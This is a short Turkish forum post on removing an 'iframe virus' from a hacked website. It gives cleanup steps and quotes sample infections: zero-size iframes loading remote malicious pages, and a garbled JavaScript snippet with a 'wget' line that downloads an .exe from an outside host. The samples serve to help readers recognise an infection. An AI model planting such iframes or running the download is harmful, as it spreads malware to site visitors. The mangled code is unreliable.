İframe virüsü o dökümanlardan temizlenmez

Bilgisayarına Format cekip ilk olarak driverlerini tanıttıktan sonra hiç bir sekilde USB aygıtı vs takmadan direk 30 günlük nod32 indirip güncelle sitenin yedeklerini ftpden indir herhangi bir upload sitesine et veya tekrardan yükle giderilmis olabilir iframe virüs kodları su sekilde olbilir index.php veya htmlde bakabilirsin
CODE
<iframe src='http://81.95.145.24x/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
Varan2
<iframe src="http://110.a38q.cn/atay.htm" width="100" height="0" frameborder="0"></iframe>
veya otomotik encode edilmiş codlar olabilir
Egg:
function encodeMyHtml() {
encodedHtml = escape(encodeHtml.htmlToEncode.value);
encodedHtml = encodedHtml.replace(/\//g,"%2F");
encodedHtml = encodedHtml.replace(/\?/g,"%3F");
encodedHtml = encodedHtml.replace(/=/g,"%3D");
encodedHtml = encodedHtml.replace(/&/g,"%26");
encodedHtml = encodedHtml.replace(/@/g,"%40");
wget shell -o
http://www.zzswhotel.com/atay.exe 1
encodeHtml.htmlEncoded.value = encodedHtml;
}